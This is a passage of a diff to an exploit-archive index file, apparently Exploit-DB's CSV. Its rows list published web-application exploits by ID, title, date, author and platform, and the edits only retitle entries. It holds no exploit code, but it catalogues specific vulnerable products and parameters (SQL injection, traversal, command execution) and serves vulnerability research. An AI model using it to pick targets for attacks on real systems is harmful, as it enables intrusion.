E-Store - 'id' Multiple SQL Injections",2014-03-08,"Nawaf Alkeraithe",php,webapps,0 39116,platforms/php/webapps/39116.txt,"GNUBoard 4.3x - 'ajax.autosave.php' Multiple SQL Injections",2014-03-19,"Claepo Wang",php,webapps,0 39117,platforms/php/webapps/39117.txt,"OpenX 2.8.x - Multiple Cross-Site Request Forgery Vulnerabilities",2014-03-15,"Mahmoud Ghorbanzadeh",php,webapps,0 39118,platforms/php/webapps/39118.html,"osCMax 2.5 - Cross-Site Request Forgery",2014-03-17,"TUNISIAN CYBER",php,webapps,0 -39124,platforms/php/webapps/39124.txt,"MeiuPic 2.1.2 - 'ctl' Parameter Local File Inclusion",2014-03-10,Dr.3v1l,php,webapps,0 -39126,platforms/php/webapps/39126.txt,"BigACE 2.7.5 - 'LANGUAGE' Parameter Directory Traversal",2014-03-19,"Hossein Hezami",php,webapps,0 +39124,platforms/php/webapps/39124.txt,"MeiuPic 2.1.2 - 'ctl' Local File Inclusion",2014-03-10,Dr.3v1l,php,webapps,0 +39126,platforms/php/webapps/39126.txt,"BigACE 2.7.5 - 'LANGUAGE' Directory Traversal",2014-03-19,"Hossein Hezami",php,webapps,0 39127,platforms/cgi/webapps/39127.txt,"innoEDIT - 'innoedit.cgi' Remote Command Execution",2014-03-21,"Felipe Andrian Peixoto",cgi,webapps,0 -39128,platforms/php/webapps/39128.txt,"Jorjweb - 'id' Parameter SQL Injection",2014-02-21,"Vulnerability Laboratory",php,webapps,0 +39128,platforms/php/webapps/39128.txt,"Jorjweb - 'id' SQL Injection",2014-02-21,"Vulnerability Laboratory",php,webapps,0 39129,platforms/php/webapps/39129.txt,"qEngine 4.1.6/6.0.0 - 'task.php' Local File Inclusion",2014-03-25,"Gjoko Krstic",php,webapps,0 39130,platforms/cgi/webapps/39130.txt,"DotItYourself - 'dot-it-yourself.cgi' Remote Command Execution",2014-03-26,"Felipe Andrian Peixoto",cgi,webapps,0 39131,platforms/cgi/webapps/39131.txt,"Beheer Systeem - 'pbs.cgi' Remote Command Execution",2014-03-26,"Felipe Andrian Peixoto",cgi,webapps,0 @@ -37061,13 +37062,13 @@ id,file,description,date,author,platform,type,port 39139,platforms/php/webapps/39139.txt,"PHPFox - Access Control Security Bypass",2014-04-05,"Wesley Henrique",php,webapps,0 39140,platforms/php/webapps/39140.txt,"Joomla! Component Inneradmission - 'index.php' SQL Injection",2014-04-08,Lazmania61,php,webapps,0 39141,platforms/php/webapps/39141.txt,"eazyCMS - 'index.php' SQL Injection",2014-04-09,Renzi,php,webapps,0 -39142,platforms/jsp/webapps/39142.txt,"Xangati - '/servlet/MGConfigData' Multiple Parameter Directory Traversal",2014-04-14,"Jan Kadijk",jsp,webapps,0 -39143,platforms/jsp/webapps/39143.txt,"Xangati - '/servlet/Installer file' Parameter Directory Traversal",2014-04-14,"Jan Kadijk",jsp,webapps,0 +39142,platforms/jsp/webapps/39142.txt,"Xangati - '/servlet/MGConfigData' Multiple Directory Traversals",2014-04-14,"Jan Kadijk",jsp,webapps,0 +39143,platforms/jsp/webapps/39143.txt,"Xangati - '/servlet/Installer?file' Directory Traversal",2014-04-14,"Jan Kadijk",jsp,webapps,0 39145,platforms/cgi/webapps/39145.txt,"Xangati XSR / XNR - 'gui_input_test.pl' Remote Command Execution",2014-04-14,"Jan Kadijk",cgi,webapps,0 39146,platforms/php/webapps/39146.txt,"Jigowatt PHP Event Calendar - 'day_view.php' SQL Injection",2014-04-14,"Daniel Godoy",php,webapps,0 39150,platforms/php/webapps/39150.txt,"Open Audit - SQL Injection",2016-01-02,"Rahul Pratap Singh",php,webapps,0 -42552,platforms/php/webapps/42552.txt,"Joomla! Component Bargain Product VM3 1.0 - 'product_id' Parameter SQL Injection",2017-08-24,"Ihsan Sencan",php,webapps,0 -42553,platforms/php/webapps/42553.txt,"Joomla! Component Price Alert 3.0.2 - 'product_id' Parameter SQL Injection",2017-08-24,"Ihsan Sencan",php,webapps,0 +42552,platforms/php/webapps/42552.txt,"Joomla! Component Bargain Product VM3 1.0 - 'product_id' SQL Injection",2017-08-24,"Ihsan Sencan",php,webapps,0 +42553,platforms/php/webapps/42553.txt,"Joomla! Component Price Alert 3.0.2 - 'product_id' SQL Injection",2017-08-24,"Ihsan Sencan",php,webapps,0 42563,platforms/php/webapps/42563.txt,"Joomla! Component Photo Contest 1.0.2 - SQL Injection",2017-08-25,"Ihsan Sencan",php,webapps,0 39153,platforms/php/webapps/39153.txt,"iDevAffiliate - 'idevads.php' SQL Injection",2014-04-22,"Robert Cooper",php,webapps,0 39156,platforms/cgi/webapps/39156.txt,"ZamFoo - Multiple Remote Command Execution Vulnerabilities",2014-04-02,Al-Shabaab,cgi,webapps,0 @@ -37076,14 +37077,14 @@ id,file,description,date,author,platform,type,port 39168,platforms/php/webapps/39168.txt,"Simple PHP Polling System - Multiple Vulnerabilities",2016-01-05,WICS,php,webapps,80 39170,platforms/xml/webapps/39170.txt,"Atlassian Confluence 5.2/5.8.14/5.8.15 - Multiple Vulnerabilities",2016-01-05,"Sebastian Perez",xml,webapps,0 39171,platforms/php/webapps/39171.txt,"PHPIPAM 1.1.010 - Multiple Vulnerabilities",2016-01-05,"Mickael Dorigny",php,webapps,0 -39172,platforms/php/webapps/39172.txt,"PrestaShop - getSimilarManufacturer.php id_manufacturer Parameter SQL Injection",2014-05-05,indoushka,php,webapps,0 -39173,platforms/php/webapps/39173.txt,"Caldera - '/costview2/jobs.php tr' Parameter SQL Injection",2014-05-07,"Thomas Fischer",php,webapps,0 -39174,platforms/php/webapps/39174.txt,"Caldera - '/costview2/printers.php tr' Parameter SQL Injection",2014-05-07,"Thomas Fischer",php,webapps,0 +39172,platforms/php/webapps/39172.txt,"PrestaShop - 'getSimilarManufacturer.php?id_manufacturer' SQL Injection",2014-05-05,indoushka,php,webapps,0 +39173,platforms/php/webapps/39173.txt,"Caldera - '/costview2/jobs.php?tr' SQL Injection",2014-05-07,"Thomas Fischer",php,webapps,0 +39174,platforms/php/webapps/39174.txt,"Caldera - '/costview2/printers.php?tr' SQL Injection",2014-05-07,"Thomas Fischer",php,webapps,0 39176,platforms/php/webapps/39176.html,"TOA - Cross-Site Request Forgery",2014-05-08,"High-Tech Bridge",php,webapps,0 -39178,platforms/php/webapps/39178.txt,"CMS Touch - pages.php Page_ID Parameter SQL Injection",2014-05-08,indoushka,php,webapps,0 +39178,platforms/php/webapps/39178.txt,"CMS Touch - 'pages.php?Page_ID' SQL Injection",2014-05-08,indoushka,php,webapps,0 39179,platforms/php/webapps/39179.txt,"CMS Touch - 'news.php' News_ID Parameter SQL Injection",2014-05-08,indoushka,php,webapps,0 39184,platforms/hardware/webapps/39184.txt,"MediaAccess TG788vn - Unauthenticated File Disclosure",2016-01-06,0x4148,hardware,webapps,0 -39187,platforms/asp/webapps/39187.txt,"CIS Manager - 'email' Parameter SQL Injection",2014-05-16,Edge,asp,webapps,0 +39187,platforms/asp/webapps/39187.txt,"CIS Manager - 'email' SQL Injection",2014-05-16,Edge,asp,webapps,0 39188,platforms/php/webapps/39188.txt,"XOOPS Glossaire Module - '/modules/glossaire/glossaire-aff.php' SQL Injection",2014-05-19,AtT4CKxT3rR0r1ST,php,webapps,0 39189,platforms/php/webapps/39189.txt,"Softmatica SMART iPBX - Multiple SQL Injections",2014-05-19,AtT4CKxT3rR0r1ST,php,webapps,0 39190,platforms/php/webapps/39190.php,"WordPress Plugin cnhk-Slideshow - Arbitrary File Upload",2014-05-18,"Ashiyane Digital Security Team",php,webapps,0 @@ -37096,11 +37097,11 @@ id,file,description,date,author,platform,type,port 39200,platforms/php/webapps/39200.txt,"PHP-Nuke 'Submit_News' Component - SQL Injection",2014-05-24,"ali ahmady",php,webapps,0 39202,platforms/php/webapps/39202.txt,"WordPress Plugin WP Symposium Pro Social Network Plugin 15.12 - Multiple Vulnerabilities",2016-01-08,"Rahul Pratap Singh",php,webapps,0 39206,platforms/php/webapps/39206.txt,"webEdition CMS - 'we_fs.php' SQL Injection",2014-05-28,"RedTeam Pentesting GmbH",php,webapps,0 -39210,platforms/php/webapps/39210.txt,"Seo Panel - 'file' Parameter Directory Traversal",2014-05-15,"Eric Sesterhenn",php,webapps,0 +39210,platforms/php/webapps/39210.txt,"Seo Panel - 'file' Directory Traversal",2014-05-15,"Eric Sesterhenn",php,webapps,0 39211,platforms/php/webapps/39211.txt,"WordPress Theme Infocus - '/infocus/lib/scripts/dl-skin.php' Local File Disclosure",2014-06-08,"Felipe Andrian Peixoto",php,webapps,0 39212,platforms/php/webapps/39212.txt,"WordPress Plugin JW Player for Flash & HTML5 Video - Cross-Site Request Forgery",2014-06-10,"Tom Adams",php,webapps,0 39213,platforms/php/webapps/39213.txt,"WordPress Plugin Featured Comments - Cross-Site Request Forgery",2014-06-10,"Tom Adams",php,webapps,0 -39223,platforms/php/webapps/39223.txt,"ZeusCart - 'prodid' Parameter SQL Injection",2014-06-24,"Kenny Mathis",php,webapps,0 +39223,platforms/php/webapps/39223.txt,"ZeusCart - 'prodid' SQL Injection",2014-06-24,"Kenny Mathis",php,webapps,0 39231,platforms/asp/webapps/39231.py,"WhatsUp Gold 16.3 - Unauthenticated Remote Code Execution",2016-01-13,"Matt Buzanowski",asp,webapps,0 39234,platforms/php/webapps/39234.py,"SevOne NMS 5.3.6.0 - Remote Command Execution",2016-01-14,@iamsecurity,php,webapps,80 39235,platforms/multiple/webapps/39235.txt,"Manage Engine Applications Manager 12 - Multiple Vulnerabilities",2016-01-14,"Bikramaditya Guha",multiple,webapps,9090 @@ -37119,19 +37120,19 @@ id,file,description,date,author,platform,type,port 39253,platforms/php/webapps/39253.txt,"WordPress Plugin ENL NewsLetter - 'wp-admin/admin.php' SQL Injection",2014-05-28,"Anant Shrivastava",php,webapps,0 39254,platforms/php/webapps/39254.html,"WordPress Plugin CopySafe PDF Protection - Arbitrary File Upload",2014-07-14,"Jagriti Sahu",php,webapps,0 39255,platforms/php/webapps/39255.html,"WEBMIS CMS - Arbitrary File Upload",2014-07-14,"Jagriti Sahu",php,webapps,0 -39256,platforms/php/webapps/39256.txt,"WordPress Plugin Tera Charts (tera-charts) - charts/treemap.php fn Parameter Directory Traversal",2014-05-28,"Anant Shrivastava",php,webapps,0 -39257,platforms/php/webapps/39257.txt,"WordPress Plugin Tera Charts (tera-charts) - charts/zoomabletreemap.php fn Parameter Directory Traversal",2014-05-28,"Anant Shrivastava",php,webapps,0 +39256,platforms/php/webapps/39256.txt,"WordPress Plugin Tera Charts (tera-charts) - 'charts/treemap.php?fn' Directory Traversal",2014-05-28,"Anant Shrivastava",php,webapps,0 +39257,platforms/php/webapps/39257.txt,"WordPress Plugin Tera Charts (tera-charts) - 'charts/zoomabletreemap.php?fn' Directory Traversal",2014-05-28,"Anant Shrivastava",php,webapps,0 39261,platforms/php/webapps/39261.txt,"Advanced Electron Forum 1.0.9 - Cross-Site Request Forgery",2016-01-18,hyp3rlinx,php,webapps,80 39262,platforms/php/webapps/39262.txt,"Advanced Electron Forum 1.0.9 - Persistent Cross-Site Scripting",2016-01-18,hyp3rlinx,php,webapps,80 39263,platforms/php/webapps/39263.txt,"Advanced Electron Forum 1.0.9 - Remote File Inclusion / Cross-Site Request Forgery",2016-01-18,hyp3rlinx,php,webapps,80 39266,platforms/php/webapps/39266.txt,"SeaWell Networks Spectrum - Multiple Vulnerabilities",2016-01-18,"Karn Ganeshen",php,webapps,443 39267,platforms/php/webapps/39267.html,"Ilya Birman E2 - '/@actions/comment-process' SQL Injection",2014-07-23,"High-Tech Bridge",php,webapps,0 39268,platforms/php/webapps/39268.java,"Ubiquiti Networks UniFi Video Default - 'crossdomain.xml' Security Bypass",2014-07-23,"Seth Art",php,webapps,0 -39269,platforms/php/webapps/39269.txt,"WordPress Plugin Lead Octopus Power - 'id' Parameter SQL Injection",2014-07-28,Amirh03in,php,webapps,0 +39269,platforms/php/webapps/39269.txt,"WordPress Plugin Lead Octopus Power - 'id' SQL Injection",2014-07-28,Amirh03in,php,webapps,0 39270,platforms/php/webapps/39270.txt,"WordPress Plugin WhyDoWork AdSense - options-general.php Cross-Site Request Forgery (Option Manipulation)",2014-07-28,"Dylan Irzi",php,webapps,0 39271,platforms/php/webapps/39271.txt,"CMSimple - Default Administrator Credentials",2014-07-28,"Govind Singh",php,webapps,0 39272,platforms/php/webapps/39272.txt,"CMSimple 4.4.4 - Remote File Inclusion",2014-07-28,"Govind Singh",php,webapps,0 -39273,platforms/php/webapps/39273.txt,"CMSimple 4.4.4 - 'color' Parameter Remote Code Execution",2014-07-28,"Govind Singh",php,webapps,0 +39273,platforms/php/webapps/39273.txt,"CMSimple 4.4.4 - 'color' Remote Code Execution",2014-07-28,"Govind Singh",php,webapps,0 39279,platforms/php/webapps/39279.txt,"WordPress Plugin wpSS - 'ss_handler.php' SQL Injection",2014-08-06,"Ashiyane Digital Security Team",php,webapps,0 39280,platforms/php/webapps/39280.txt,"WordPress Plugin HDW Player - 'wp-admin/admin.php' SQL Injection",2014-05-28,"Anant Shrivastava",php,webapps,0 39281,platforms/php/webapps/39281.txt,"VoipSwitch - 'user.php' Local File Inclusion",2014-08-08,0x4148,php,webapps,0 @@ -37139,10 +37140,10 @@ id,file,description,date,author,platform,type,port 39283,platforms/php/webapps/39283.txt,"WordPress Plugin FB Gorilla - 'game_play.php' SQL Injection",2014-07-28,Amirh03in,php,webapps,0 39287,platforms/php/webapps/39287.txt,"WordPress Plugin WP Content Source Control - 'download.php' Directory Traversal",2014-08-19,"Henri Salo",php,webapps,0 39288,platforms/multiple/webapps/39288.txt,"ManageEngine Password Manager Pro and ManageEngine IT360 - SQL Injection",2014-08-20,"Pedro Ribeiro",multiple,webapps,0 -39289,platforms/php/webapps/39289.txt,"ArticleFR - 'id' Parameter SQL Injection",2014-08-20,"High-Tech Bridge",php,webapps,0 +39289,platforms/php/webapps/39289.txt,"ArticleFR - 'id' SQL Injection",2014-08-20,"High-Tech Bridge",php,webapps,0 39290,platforms/php/webapps/39290.txt,"MyAwards MyBB Module - Cross-Site Request Forgery",2014-08-22,Vagineer,php,webapps,0 39291,platforms/php/webapps/39291.txt,"WordPress Plugin KenBurner Slider - 'admin-ajax.php' Arbitrary File Download",2014-08-24,MF0x,php,webapps,0 -39294,platforms/php/webapps/39294.txt,"Joomla! Component spidervideoplayer - 'theme' Parameter SQL Injection",2014-08-26,"Claudio Viviani",php,webapps,0 +39294,platforms/php/webapps/39294.txt,"Joomla! Component spidervideoplayer - 'theme' SQL Injection",2014-08-26,"Claudio Viviani",php,webapps,0 39296,platforms/php/webapps/39296.txt,"WordPress Theme Urban City - 'download.php' Arbitrary File Download",2014-09-08,"Ashiyane Digital Security Team",php,webapps,0 39297,platforms/php/webapps/39297.txt,"WordPress Theme Authentic - 'download.php' Arbitrary File Download",2014-09-08,"Ashiyane Digital Security Team",php,webapps,0 39298,platforms/php/webapps/39298.txt,"WordPress Theme Epic - 'download.php' Arbitrary File Download",2014-09-08,"Ashiyane Digital Security Team",php,webapps,0 @@ -37166,10 +37167,10 @@ id,file,description,date,author,platform,type,port 39339,platforms/php/webapps/39339.txt,"BK Mobile jQuery CMS 2.4 - Multiple Vulnerabilities",2016-01-27,"Rahul Pratap Singh",php,webapps,80 39341,platforms/php/webapps/39341.txt,"WordPress Plugin Booking Calendar Contact Form 1.1.24 - Multiple Vulnerabilities",2016-01-27,"i0akiN SEC-LABORATORY",php,webapps,80 39342,platforms/php/webapps/39342.txt,"WordPress Plugin Booking Calendar Contact Form 1.1.24 - addslashes SQL Injection",2016-01-27,"i0akiN SEC-LABORATORY",php,webapps,80 -39343,platforms/php/webapps/39343.txt,"OL-Commerce - '/OL-Commerce/affiliate_signup.php a_country' Parameter SQL Injection",2014-07-17,AtT4CKxT3rR0r1ST,php,webapps,0 -39344,platforms/php/webapps/39344.txt,"OL-Commerce - '/OL-Commerce/affiliate_show_banner.php affiliate_banner_id' Parameter SQL Injection",2014-07-17,AtT4CKxT3rR0r1ST,php,webapps,0 -39345,platforms/php/webapps/39345.txt,"OL-Commerce - '/OL-Commerce/create_account.php country' Parameter SQL Injection",2014-07-17,AtT4CKxT3rR0r1ST,php,webapps,0 -39346,platforms/php/webapps/39346.txt,"OL-Commerce - '/OL-Commerce/admin/create_account.php entry_country_id' Parameter SQL Injection",2014-07-17,AtT4CKxT3rR0r1ST,php,webapps,0 +39343,platforms/php/webapps/39343.txt,"OL-Commerce - '/OL-Commerce/affiliate_signup.php?a_country' SQL Injection",2014-07-17,AtT4CKxT3rR0r1ST,php,webapps,0 +39344,platforms/php/webapps/39344.txt,"OL-Commerce - '/OL-Commerce/affiliate_show_banner.php?affiliate_banner_id' SQL Injection",2014-07-17,AtT4CKxT3rR0r1ST,php,webapps,0 +39345,platforms/php/webapps/39345.txt,"OL-Commerce - '/OL-Commerce/create_account.php?country' SQL Injection",2014-07-17,AtT4CKxT3rR0r1ST,php,webapps,0 +39346,platforms/php/webapps/39346.txt,"OL-Commerce - '/OL-Commerce/admin/create_account.php?entry_country_id' SQL Injection",2014-07-17,AtT4CKxT3rR0r1ST,php,webapps,0 39347,platforms/php/webapps/39347.txt,"Fonality trixbox - 'endpoint_generic.php' SQL Injection",2014-07-17,AtT4CKxT3rR0r1ST,php,webapps,0 39348,platforms/php/webapps/39348.txt,"Fonality trixbox - 'index.php' Directory Traversal",2014-07-17,AtT4CKxT3rR0r1ST,php,webapps,0 39349,platforms/php/webapps/39349.txt,"Fonality trixbox - 'asterisk_info.php' Directory Traversal",2014-07-17,AtT4CKxT3rR0r1ST,php,webapps,0 @@ -37264,7 +37265,7 @@ id,file,description,date,author,platform,type,port 39589,platforms/php/webapps/39589.txt,"WordPress Plugin HB Audio Gallery Lite 1.0.0 - Arbitrary File Download",2016-03-22,CrashBandicot,php,webapps,80 39590,platforms/php/webapps/39590.txt,"Joomla! Component Easy Youtube Gallery 1.0.2 - SQL Injection",2016-03-22,"Persian Hack Team",php,webapps,80 39591,platforms/php/webapps/39591.txt,"WordPress Plugin Brandfolder 3.0 - Local/Remote File Inclusion",2016-03-22,AMAR^SHG,php,webapps,80 -39592,platforms/php/webapps/39592.txt,"WordPress Plugin Dharma Booking 2.38.3 - Remote File Inclusion",2016-03-22,AMAR^SHG,php,webapps,80 +39592,platforms/php/webapps/39592.txt,"WordPress Plugin Dharma Booking 2.38.3 - Remote File Inclusion",2016-03-22,AMAR^SHG,php,webapps,80 39593,platforms/php/webapps/39593.txt,"WordPress Plugin Memphis Document Library 3.1.5 - Arbitrary File Download",2016-03-22,"Felipe Molina",php,webapps,80 39597,platforms/multiple/webapps/39597.txt,"MiCollab 7.0 - SQL Injection",2016-03-23,"Goran Tuzovic",multiple,webapps,80 39621,platforms/php/webapps/39621.txt,"WordPress Plugin IMDb Profile Widget 1.0.8 - Local File Inclusion",2016-03-27,CrashBandicot,php,webapps,80 @@ -37326,7 +37327,7 @@ id,file,description,date,author,platform,type,port 39780,platforms/jsp/webapps/39780.txt,"ManageEngine Applications Manager Build 12700 - Multiple Vulnerabilities",2016-05-06,"Saif El-Sherei",jsp,webapps,443 39781,platforms/php/webapps/39781.txt,"Ajaxel CMS 8.0 - Multiple Vulnerabilities",2016-05-09,DizzyDuck,php,webapps,80 39784,platforms/php/webapps/39784.txt,"ZeewaysCMS - Multiple Vulnerabilities",2016-05-09,"Bikramaditya Guha",php,webapps,80 -39798,platforms/hardware/webapps/39798.txt,"Multiple JVC HDRs and Net Cameras - Multiple Vulnerabilities",2016-05-10,Orwelllabs,hardware,webapps,80 +39798,platforms/hardware/webapps/39798.txt,"JVC HDRs / Net (Multiple Cameras) - Multiple Vulnerabilities",2016-05-10,Orwelllabs,hardware,webapps,80 39806,platforms/php/webapps/39806.txt,"WordPress Plugin Q and A (Focus Plus) FAQ 1.3.9.7 - Multiple Vulnerabilities",2016-05-12,"Gwendal Le Coguic",php,webapps,80 39807,platforms/php/webapps/39807.txt,"WordPress Plugin Huge-IT Image Gallery 1.8.9 - Multiple Vulnerabilities",2016-05-12,"Gwendal Le Coguic",php,webapps,80 39808,platforms/windows/webapps/39808.txt,"Trend Micro - 'CoreServiceShell.exe' Multiple HTTP Issues",2016-05-12,"Google Security Research",windows,webapps,37848 @@ -37414,7 +37415,7 @@ id,file,description,date,author,platform,type,port 39989,platforms/php/webapps/39989.txt,"Joomla! Component com_publisher - SQL Injection",2016-06-21,s0nk3y,php,webapps,80 39995,platforms/java/webapps/39995.txt,"SAP NetWeaver AS JAVA 7.1 < 7.5 - ctcprotocol Servlet XXE",2016-06-21,ERPScan,java,webapps,0 39996,platforms/java/webapps/39996.txt,"SAP NetWeaver AS JAVA 7.1 < 7.5 - Directory Traversal",2016-06-21,ERPScan,java,webapps,0 -39997,platforms/ruby/webapps/39997.txt,"Radiant CMS 1.1.3 - Multiple Persistent Cross-Site Scripting",2016-06-21,"David Silveiro",ruby,webapps,80 +39997,platforms/ruby/webapps/39997.txt,"Radiant CMS 1.1.3 - Multiple Persistent Cross-Site Scripting Vulnerabilities",2016-06-21,"David Silveiro",ruby,webapps,80 39998,platforms/php/webapps/39998.txt,"YetiForce CRM < 3.1 - Persistent Cross-Site Scripting",2016-06-21,"David Silveiro",php,webapps,80 40111,platforms/php/webapps/40111.txt,"Joomla! Component Guru Pro - SQL Injection",2016-07-14,s0nk3y,php,webapps,80 40006,platforms/php/webapps/40006.txt,"Alibaba Clone B2B Script - Arbitrary File Disclosure",2016-06-23,"Meisam Monsef",php,webapps,80 @@ -37459,13 +37460,13 @@ id,file,description,date,author,platform,type,port 40114,platforms/php/webapps/40114.py,"vBulletin 4.x/5.x - AdminCP/ApiLog via xmlrpc API Authenticated Persistent Cross-Site Scripting",2014-10-12,tintinweb,php,webapps,0 40115,platforms/php/webapps/40115.py,"vBulletin 4.x - breadcrumbs via xmlrpc API Authenticated SQL Injection",2014-10-12,tintinweb,php,webapps,0 40193,platforms/php/webapps/40193.txt,"Open Upload 0.4.2 - Cross-Site Request Forgery (Add Admin)",2016-08-02,"Vinesh Redkar",php,webapps,80 -40171,platforms/linux/webapps/40171.txt,"AXIS Multiple Products - 'devtools ' Authenticated Remote Command Execution",2016-07-29,Orwelllabs,linux,webapps,80 +40171,platforms/linux/webapps/40171.txt,"AXIS (Multiple Products) - 'devtools ' Authenticated Remote Command Execution",2016-07-29,Orwelllabs,linux,webapps,80 40126,platforms/php/webapps/40126.txt,"NewsP Free News Script 1.4.7 - User Credentials Disclosure",2016-07-19,"Meisam Monsef",php,webapps,80 40127,platforms/php/webapps/40127.txt,"newsp.eu PHP Calendar Script 1.0 - User Credentials Disclosure",2016-07-19,"Meisam Monsef",php,webapps,80 40129,platforms/python/webapps/40129.txt,"Django CMS 3.3.0 - (Editor Snippet) Persistent Cross-Site Scripting",2016-07-20,Vulnerability-Lab,python,webapps,80 40133,platforms/multiple/webapps/40133.html,"Wowza Streaming Engine 4.5.0 - Remote Privilege Escalation",2016-07-20,LiquidWorm,multiple,webapps,8088 40134,platforms/multiple/webapps/40134.html,"Wowza Streaming Engine 4.5.0 - Cross-Site Request Forgery (Add Advanced Admin)",2016-07-20,LiquidWorm,multiple,webapps,8088 -40135,platforms/multiple/webapps/40135.txt,"Wowza Streaming Engine 4.5.0 - Multiple Cross-Site Scripting",2016-07-20,LiquidWorm,multiple,webapps,8088 +40135,platforms/multiple/webapps/40135.txt,"Wowza Streaming Engine 4.5.0 - Multiple Cross-Site Scripting Vulnerabilities",2016-07-20,LiquidWorm,multiple,webapps,8088 40137,platforms/php/webapps/40137.html,"WordPress Plugin Video Player 1.5.16 - SQL Injection",2016-07-20,"David Vaartjes",php,webapps,80 40140,platforms/php/webapps/40140.txt,"TeamPass Passwords Management System 2.1.26 - Arbitrary File Download",2016-07-21,"Hasan Emre Ozer",php,webapps,80 40149,platforms/php/webapps/40149.rb,"Drupal Module CODER 2.5 - Remote Command Execution (Metasploit)",2016-07-25,"Mehmet Ince",php,webapps,80 @@ -37502,7 +37503,7 @@ id,file,description,date,author,platform,type,port 40216,platforms/jsp/webapps/40216.txt,"Navis Webaccess - SQL Injection",2016-08-08,bRpsd,jsp,webapps,9000 40218,platforms/php/webapps/40218.txt,"PHPCollab CMS 2.5 - 'emailusers.php' SQL Injection",2016-08-08,Vulnerability-Lab,php,webapps,80 40220,platforms/php/webapps/40220.txt,"WordPress Plugin Add From Server < 3.3.2 - Cross-Site Request Forgery (Arbitrary File Upload)",2016-08-08,"Edwin Molenaar",php,webapps,80 -40221,platforms/php/webapps/40221.txt,"Nagios Network Analyzer 2.2.1 - Multiple Cross-Site Request Forgery",2016-08-10,hyp3rlinx,php,webapps,80 +40221,platforms/php/webapps/40221.txt,"Nagios Network Analyzer 2.2.1 - Multiple Cross-Site Request Forgery Vulnerabilities",2016-08-10,hyp3rlinx,php,webapps,80 40225,platforms/php/webapps/40225.py,"vBulletin 5.2.2 - Unauthenticated Server-Side Request Forgery",2016-08-10,"Dawid Golunski",php,webapps,80 40227,platforms/php/webapps/40227.txt,"EyeLock nano NXT 3.5 - Local File Disclosure",2016-08-10,LiquidWorm,php,webapps,80 40228,platforms/php/webapps/40228.py,"EyeLock nano NXT 3.5 - Remote Code Execution",2016-08-10,LiquidWorm,php,webapps,80 @@ -37558,7 +37559,7 @@ id,file,description,date,author,platform,type,port 40467,platforms/php/webapps/40467.txt,"PHP Classifieds Rental Script - Blind SQL Injection",2016-10-06,OoN_Boy,php,webapps,0 40468,platforms/php/webapps/40468.txt,"B2B Portal Script - Blind SQL Injection",2016-10-06,OoN_Boy,php,webapps,0 40469,platforms/php/webapps/40469.txt,"MLM Unilevel Plan Script 1.0.2 - SQL Injection",2016-10-06,N4TuraL,php,webapps,0 -40470,platforms/php/webapps/40470.txt,"Just Dial Clone Script - 'fid' Parameter SQL Injection",2016-10-06,OoN_Boy,php,webapps,0 +40470,platforms/php/webapps/40470.txt,"Just Dial Clone Script - 'fid' SQL Injection",2016-10-06,OoN_Boy,php,webapps,0 40475,platforms/php/webapps/40475.txt,"Simple PHP Blog 0.8.4 - Cross-Site Request Forgery (Add Admin)",2016-10-07,Besim,php,webapps,0 40479,platforms/php/webapps/40479.txt,"Entrepreneur Job Portal Script 2.06 - SQL Injection",2016-10-07,OoN_Boy,php,webapps,0 40480,platforms/php/webapps/40480.txt,"miniblog 1.0.1 - Cross-Site Request Forgery (Add New Post)",2016-10-09,Besim,php,webapps,0 @@ -37609,7 +37610,7 @@ id,file,description,date,author,platform,type,port 40595,platforms/php/webapps/40595.txt,"SPIP 3.1.2 Template Compiler/Composer - PHP Code Execution",2016-10-20,Sysdream,php,webapps,80 40596,platforms/php/webapps/40596.txt,"SPIP 3.1.1/3.1.2 - File Enumeration / Path Traversal",2016-10-20,Sysdream,php,webapps,80 40597,platforms/php/webapps/40597.txt,"SPIP 3.1.2 - Cross-Site Request Forgery",2016-10-20,Sysdream,php,webapps,80 -40612,platforms/php/webapps/40612.txt,"Just Dial Clone Script - 'srch' Parameter SQL Injection",2016-10-21,"Arbin Godar",php,webapps,0 +40612,platforms/php/webapps/40612.txt,"Just Dial Clone Script - 'srch' SQL Injection",2016-10-21,"Arbin Godar",php,webapps,0 40614,platforms/php/webapps/40614.py,"FreePBX 13 - Remote Command Execution / Privilege Escalation",2016-10-21,"Christopher Davis",php,webapps,0 40620,platforms/php/webapps/40620.txt,"Zenbership 107 - Multiple Vulnerabilities",2016-10-23,Besim,php,webapps,0 40626,platforms/hardware/webapps/40626.txt,"Orange Inventel LiveBox 5.08.3-sp - Cross-Site Request Forgery",2016-10-24,BlackMamba,hardware,webapps,0 @@ -37619,7 +37620,7 @@ id,file,description,date,author,platform,type,port 40642,platforms/php/webapps/40642.txt,"InfraPower PPS-02-S Q213V1 - Local File Disclosure",2016-10-28,LiquidWorm,php,webapps,0 40644,platforms/php/webapps/40644.txt,"InfraPower PPS-02-S Q213V1 - Insecure Direct Object Reference",2016-10-28,LiquidWorm,php,webapps,0 40645,platforms/php/webapps/40645.txt,"InfraPower PPS-02-S Q213V1 - Authentication Bypass",2016-10-28,LiquidWorm,php,webapps,0 -40641,platforms/php/webapps/40641.txt,"InfraPower PPS-02-S Q213V1 - Multiple Cross-Site Scripting",2016-10-28,LiquidWorm,php,webapps,0 +40641,platforms/php/webapps/40641.txt,"InfraPower PPS-02-S Q213V1 - Multiple Cross-Site Scripting Vulnerabilities",2016-10-28,LiquidWorm,php,webapps,0 40646,platforms/php/webapps/40646.txt,"InfraPower PPS-02-S Q213V1 - Cross-Site Request Forgery",2016-10-28,LiquidWorm,php,webapps,0 40640,platforms/hardware/webapps/40640.txt,"InfraPower PPS-02-S Q213V1 - Unauthenticated Remote Command Execution",2016-10-28,LiquidWorm,hardware,webapps,0 40637,platforms/php/webapps/40637.txt,"Joomla! 3.4.4 < 3.6.4 - Account Creation / Privilege Escalation",2016-10-27,"Xiphos Research Ltd",php,webapps,80 @@ -37637,7 +37638,7 @@ id,file,description,date,author,platform,type,port 40706,platforms/php/webapps/40706.txt,"sNews 1.7.1 - Arbitrary File Upload",2016-11-03,Amir.ght,php,webapps,0 40707,platforms/php/webapps/40707.html,"nodCMS - Cross-Site Request Forgery",2016-11-03,Amir.ght,php,webapps,0 40708,platforms/php/webapps/40708.html,"Redaxo 5.2.0 - Cross-Site Request Forgery",2016-11-03,Amir.ght,php,webapps,0 -40719,platforms/php/webapps/40719.txt,"Schoolhos CMS 2.29 - 'kelas' Parameter SQL Injection",2016-11-07,Vulnerability-Lab,php,webapps,0 +40719,platforms/php/webapps/40719.txt,"Schoolhos CMS 2.29 - 'kelas' SQL Injection",2016-11-07,Vulnerability-Lab,php,webapps,0 40723,platforms/php/webapps/40723.txt,"NodCMS - PHP Code Execution",2016-11-07,"Ashiyane Digital Security 